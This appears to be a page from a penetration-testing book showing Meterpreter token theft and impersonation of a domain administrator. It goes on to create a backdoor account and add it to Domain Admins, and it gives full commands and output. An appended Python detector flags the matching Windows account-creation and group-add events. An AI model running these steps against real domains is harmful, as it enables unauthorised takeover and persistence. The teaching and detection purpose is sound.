
88

Chapter 6

As shown in the following listing, we leverage steal_token and the PID (380 in this case) to steal the token of that user and assume the role of the domain administrator:

meterpreter > steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >

We have successfully impersonated the domain administrator account, and Meterpreter is now running under the context of that user.

In some cases, ps may not list a running process that is running as a domain administrator. We can leverage incognito to list available tokens on the system as well. When performing a penetration test, we should check the output of both ps and incognito, because the results may vary.

We load incognito with use incognito and then list tokens with list_tokens -u. Looking through the list of tokens, we see the SNEAKS.IN\ihazdomainadmin user account at  . Now we can pretend to be someone else.

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

As shown in the next listing, we successfully impersonate the ihazdomainadmin token at   and add a user account at  , which we then give domain administrator rights at  . (Be sure to use two backslashes, \\, when entering the DOMAIN\USERNAME at  .) Our domain controller is 192.168.33.50.

meterpreter > impersonate_token SNEAKS.IN\\ihazdomainadmin
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller 192.168.33.50
[+] Successfully added user to group
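From the defender's side, the add_user / add_group_user sequence above leaves a clear trail on the domain controller: a 4720 (user account created) followed within seconds by a 4728 (member added to a security-enabled global group) naming Domain Admins. The following correlation is an added example written for this chapter, not code from the book or from Metasploit; the event records are constructed, and the field names (SubjectUserName, TargetUserName, MemberName) mirror the Windows Security log's event data.

```python
from datetime import datetime, timedelta

# Constructed sample Security-log events (not taken from the page). Real events
# carry many more fields; only those the correlation needs are kept here.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2024-01-10T09:01:10", "Computer": "DC01",
     "SubjectUserName": "ihazdomainadmin", "TargetUserName": "omgcompromised"},
    {"EventID": 4728, "Time": "2024-01-10T09:01:25", "Computer": "DC01",
     "SubjectUserName": "ihazdomainadmin", "TargetUserName": "Domain Admins",
     "MemberName": "CN=omgcompromised,CN=Users,DC=sneaks,DC=in"},
    {"EventID": 4720, "Time": "2024-01-10T11:00:00", "Computer": "DC01",
     "SubjectUserName": "hr.provisioning", "TargetUserName": "newhire"},
]

# Groups whose membership changes should be treated as privilege escalation.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
# 4728 = global group, 4732 = local group, 4756 = universal group member added.
GROUP_ADD_EVENTS = {4728, 4732, 4756}


def account_from_member(member):
    """4728/4732/4756 report the member as a distinguished name; return its CN."""
    if member.upper().startswith("CN="):
        return member[3:].split(",", 1)[0].lower()
    return member.lower()


def find_rapid_escalations(events, window=timedelta(minutes=10)):
    """Return (account, group, actor, seconds) for every account that is added
    to a privileged group within `window` of its own creation (event 4720)."""
    created = {}  # account -> (creation time, creating principal)
    hits = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = (when, ev["SubjectUserName"])
        elif ev["EventID"] in GROUP_ADD_EVENTS and ev["TargetUserName"] in PRIVILEGED_GROUPS:
            account = account_from_member(ev["MemberName"])
            if account in created and when - created[account][0] <= window:
                delay = int((when - created[account][0]).total_seconds())
                hits.append((account, ev["TargetUserName"], ev["SubjectUserName"], delay))
    return hits


if __name__ == "__main__":
    for account, group, actor, delay in find_rapid_escalations(SAMPLE_EVENTS):
        print(f"ALERT: {actor} created {account} and added it to {group} {delay}s later")
```

The newhire account is created but never added to a privileged group, so only the omgcompromised sequence is reported.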